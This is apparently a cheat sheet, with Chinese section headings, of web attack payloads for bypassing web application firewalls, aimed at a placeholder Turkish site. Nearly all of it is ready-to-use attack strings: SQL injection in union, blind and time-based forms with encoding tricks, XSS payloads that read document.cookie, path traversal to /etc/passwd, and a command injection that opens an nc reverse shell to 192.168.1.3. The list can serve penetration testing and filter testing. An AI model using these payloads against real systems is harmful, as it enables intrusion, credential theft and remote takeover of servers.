SQL注入和XSS bypass waf 测试向量

 1. 识别脆弱点

http://www.site.com.tr/uyg.asp?id=123'+union+selec+1,2,3--
http://www.site.com.tr/uyg.asp?id=123'
http://www.site.com.tr/uyg.asp?id=123<12("/>

2. HTTP参数污染(HPP)
http://www.site.com.tr/uyg.asp?id=123&id=456
http://www.site.com.tr/uyg.asp?id=123+select+1,2,3+from+table
http://www.site.com.tr/uyg.asp?id=123+select+1&id=2,3+from+table
http://www.site.com.tr/uyg.asp?id=select/&id=/user&id=pass/&id=/from/*&id=*/users id=select/*,*/user,pass/*,*/from/*,*/users

3. HTTP参数碎片(HPF)
uyg.asp?brandid=123+union/*&prodid=*/select+user,pass/*&price=*/from users--
select * from table1.markt where brand=123 union/* and prodid=*/select username,pass/*order by*/from users--

4. 编码
URL Encode - %27
Double URL Encode - %2527
UTF-8 (2 byte) - %c0%a7
UTF-8 (JAVA) - /uc0a7
HTML Entity - &apos;
HTML Entity Number - &#27;
Decimal - &#39
Unicode URL Encoding - %u0027
Base64 - Jw==

uyg.asp?id=<script>alert(1)</script>

uyg.asp?id=%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e
uyg.asp?id=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e
uyg.asp?id=%3cscript%3ealert(1)%3c%2fscript%3c
uyg.asp?id=%3cscript%3ealert(1)%3c/script%3c
uyg.asp?id=%3cscript%3ealert%281%29%3c%2fscript%3c
uyg.asp?id=%%3c%2fsCrIpT%3e%3csCrIpT%3ealert(1)%3c%2fsCrIpT%3e
uyg.asp?id=%A2%BE%BCscript%BEalert(1)%BC/script%BE
uyg.asp?id=<a href="javas&#99;ript&#35;alert(1);">
uyg.asp?id=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
uyg.asp?id=data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
uyg.asp?id=0;data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg=="+http-equiv="refresh" "

uyg.asp?id=123 or '1'='1

uyg.asp?id=123%20or%20%271%27=%271
uyg.asp?id=123%20or%20%c0%a7%c01%a71=%c0%a71
uyg.asp?id=123%2527%2520select%2520convert(int,@@servername)--
uyg.asp?id=123K29yKycxJz0nMQ==

uyg.asp?id=123;nc -e /bin/bash 192.168.1.3 12345;

uyg.asp?id=%61%3b%6e%63%20%2d%65%20%2f%62%69%6e%2f%62%61%73%68%20%31%39%32%2e%31%36%38%2e%31%2e%33%20%31%32%33%34%35%3b

5. Script标签
uyg.asp?id="+onmouseover="window.location='http://www.site.com.tr/code.js'
uyg.asp?id="+style%3d"x%3aexpression(alert(1))+
uyg.asp?id="+onkeypress="alert(23)"+"
uyg.asp?id=123); alert(document.cookie);//
uyg.asp?id=javascript:alert(1)
uyg.asp?id=alert(document.cookie)
uyg.asp?id=alert(document['cookie'])
uyg.asp?id=with(document)alert(cookie)
uyg.asp?id=";location=location.hash)//#0={};alert(0)
uyg.asp?id=//";alert(String.fromCharCode(88,83,83))
uyg.asp?id=%F6%3Cimg+onmouseover=prompt(/test/)//%F6%3E
uyg.asp?id=%'});%0aalert(1);%20//
uyg.asp?id=%";eval(unescape(location))//#%0Aalert(0)
uyg.asp?id=0;url=javascript:alert(1)" http-equiv="refresh" "
uyg.asp?id=onError="javascript:decipher(document.forms.cipher); alert(document.forms.cipher.stream.value); document.forms.cipher.stream.value = document.forms.cipher.stream_copy.value;

uyg.php?id=<script>String.fromCharCode(61)</script>
uyg.php?id=10+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764)
uyg.asp?id=if(substring(USER(),1,4)=0x726f6f74,SLEEP(5),1)

6. 跨站脚本
uyg.asp?id=<img/src="xss.png"alt="xss">
uyg.asp?id=<object data="javascript:alert(1)">
uyg.asp?id=<object><param name="src" value="javascript:alert(1)"></param></object>
uyg.asp?id=<isindex type=image src=1 onerror=alert(1)>
uyg.asp?id=<isindex action=javascript:alert(1) type=image>
uyg.asp?id=<img src=x:alert(alt) onerror=eval(src) alt=0>
uyg.asp?id=<meta style="xss:expression(open(alert(1)))" />
uyg.asp?id=<!</textarea <body onload='alert(1)'>
uyg.asp?id=</ style=?=-=expression/28write(12345)/29>
uyg.asp?id=<script>document.write(1)</script>
uyg.asp?id=<img <iframe ="1" onerror="alert(1)">
uyg.asp?id=<script<{alert(1)}/></script>
uyg.asp?id=">alert(String.fromCharCode(88,83,83));
uyg.asp?id=</XSS/*-*/STYLE=xss:e/**/xpression(alert(1))>
uyg.asp?id=<//STYLE=x:e/**/xpression(alert('xss'))>
uyg.asp?id=<object+data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

7. 盲注入
uyg.asp?id=1+and+ascii(lower(substring((select+pwd+from+users+limit+1,1),1,1)))=74--
uyg.asp?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74--
uyg.asp?id=1+and+ascii('a')=97
uyg.asp?id=1+and+hex('a')=61
uyg.asp?id=ord('a') = 97
uyg.asp?id=if(substring(USER(),1,4)='root',BENCHMARK(100000000,RAND()),1)--
uyg.asp?id=if(substring(USER(),1,4)='root',SLEEP(5),1)--
uyg.asp?id=123' and (select pass from users limit 1)='pass--

8. 其他注入
uyg.asp?id=123+AND+1=1
uyg.asp?id=123+&&+1=1
uyg.asp?id='='
uyg.asp?id=123+AND+md5('a')!= md5('A')
uyg.asp?id=123+and+len(@@version)>1
uyg.asp?id=1'||1='1
uyg.asp?id=123'+like+'123
uyg.asp?id=123'+not+like+'1234
uyg.asp?id='aaa'<>'bbb'

uyg.asp?id=123+1-1 (id=123)
uyg.asp?id=123+1 (id=124)
uyg.asp?id=123+len(1234)-len(123) (id=124)
uyg.asp?id=123+len(@@server)-len(@@server)

uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1/*union*/union/*select*/select+1,2,3/*
uyg.php?id=1%2520union%2520select%25201,2,3/*
uyg.php?id=1%0Aunion%0Aselect%0A1,2,3/*
uyg.php?id=1/**/union%a0select/**/1,pass,3`a`from`users`
uyg.php?id=(0)union(select(table_schema),table_name,(0)from(information_schema.tables)having((table_schema)like(0x74657374)&&(table_name)!=(0x7573657273)))#

uyg.php?id=union(select(version()))--

uyg.php?id=123/*! union all select version() */--
uyg.php?id=123/*!or*/1=1;

uyg.php?id=1+union+select+1,2,3/*
uyg.php?id=1+union+select+1,2,3--
uyg.php?id=1+union+select+1,2,3#
uyg.php?id=1+union+select+1,2,3;%00

uyg.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%00TESTTEST%3E
uyg.php?id=%3Cscript%3Ealert(document.cookie)%3C/script%20TESTTEST%3E
uyg.php?id=";eval(unescape(location))//#%0Aalert(0)
uyg.php?file=../../../../../etc/passwd/////[…]/////
uyg.php?file=../../../../../etc/passwd//////////////
uyg.php?file=.//././/././/./boot.ini uyg.php?id%00TESTTEST=1+union+select+1,2,3
uyg.php?id%20TESTTEST=1+union+select+1,2,3
uyg.php?id=1234&"><script>alert(1)</script>=1234
uyg.php?id=%00><script>alert(123)</script>

9. URL重写
http://localhost/uyg/id/123+or+1=1/tp/456